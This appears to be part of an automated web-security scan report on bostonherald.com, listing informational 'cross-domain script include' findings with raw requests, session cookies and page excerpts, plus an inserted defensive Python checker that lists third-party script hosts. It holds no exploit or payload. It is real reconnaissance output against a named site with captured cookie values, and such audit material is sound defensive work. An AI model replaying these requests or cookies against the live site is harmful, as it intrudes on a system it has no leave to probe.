<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.4info.net/alert/ads/fastTrackAlerts.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.658. http://www.bostonherald.com/ne_snow/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /ne_snow/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ne_snow/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:14:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 130027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<script type="text/javascript" src="http://cache.heraldinteractive.com/js/function_library.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
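Each "Cross-domain script include" finding in this section lists a page whose HTML pulls JavaScript from hosts other than www.bostonherald.com, which means every one of those hosts (and, because the includes are plain http://, any attacker on the network path) can run code in the page's origin. The scanner's own list of offending URLs did not survive in this copy, so the following is an added example, not scanner output, that reproduces the check from the request Host and response body: it resolves relative and protocol-relative src values against the page URL, drops same-host scripts, de-duplicates, and groups the rest by host while flagging hosts fetched over plain HTTP. The sample HTML is a constructed excerpt modelled on the 18.658 response above; the /js/site_local.js, //edge.quantserve.com and https://s7.addthis.com entries are added to exercise the resolver.

```python
"""Cross-domain script include check (added example, standard library only)."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

PAGE_URL = "http://www.bostonherald.com/ne_snow/"

# Constructed excerpt modelled on the 18.658 response; relative, protocol-relative
# and https entries are added here to exercise the resolver.
SAMPLE_HTML = """<html><head>
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="/js/site_local.js" type="text/javascript"></script>
<script type="text/javascript">var inline = 1;</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
<script src="//edge.quantserve.com/quant.js"></script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
<script src="https://s7.addthis.com/js/200/addthis_widget.js"></script>
</head><body>...[SNIP]...</body></html>"""


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> start tag, whatever its case."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def script_srcs(html):
    """Return every raw <script src> value in document order."""
    parser = _ScriptSrcCollector()
    parser.feed(html)
    return parser.srcs


def cross_domain_scripts(page_url, html):
    """Absolute URLs of scripts loaded from a host other than the page's own host.

    Relative and protocol-relative values are resolved against page_url first, so
    "//cdn/x.js" on an http:// page is correctly reported as an http:// include.
    Duplicates (the same script included twice) are reported once.
    """
    page_host = urlsplit(page_url).hostname
    found, seen = [], set()
    for src in script_srcs(html):
        absolute = urljoin(page_url, src)
        host = urlsplit(absolute).hostname
        if host and host != page_host and absolute not in seen:
            seen.add(absolute)
            found.append(absolute)
    return found


def report(page_url, html):
    """Group cross-domain includes by host; plain_http marks hosts loaded over http://."""
    hosts = {}
    for url in cross_domain_scripts(page_url, html):
        parts = urlsplit(url)
        entry = hosts.setdefault(parts.hostname, {"urls": [], "plain_http": False})
        entry["urls"].append(url)
        if parts.scheme == "http":
            entry["plain_http"] = True
    return hosts


if __name__ == "__main__":
    for host, entry in report(PAGE_URL, SAMPLE_HTML).items():
        flag = "plain HTTP" if entry["plain_http"] else "https"
        print(f"{host} ({flag})")
        for url in entry["urls"]:
            print(f"    {url}")
```

Run it against a saved response body with the page URL from the request line and it yields the same host list the scanner summarises as "scripts from other domains". Two caveats a reviewer should keep in mind: the check is static, so scripts injected at runtime by ad tags (document.write chains from the DoubleClick and AdBrite endpoints seen elsewhere in this report) will not appear, and a host being first-party (cache.heraldinteractive.com is clearly the site's own CDN) does not change the origin model; it still executes in the bostonherald.com page, so it deserves the same integrity and transport review as the ad networks.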

18.659. http://www.bostonherald.com/news/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:16:47 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 105318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.660. http://www.bostonherald.com/news/columnists/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/columnists/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/columnists/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:44:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 62757

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.661. http://www.bostonherald.com/news/columnists/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/columnists/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/columnists/view.bg?articleid=1312540&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.662. http://www.bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:47:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.663. http://www.bostonherald.com/news/international/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/international/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/international/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:48:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">


<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.664. http://www.bostonherald.com/news/international/africa/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/international/africa/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/international/africa/view.bg?articleid=1312633&pos=breaking HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:49:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 49187

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.665. http://www.bostonherald.com/news/national/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /news/national/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/national/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:43:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 58540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
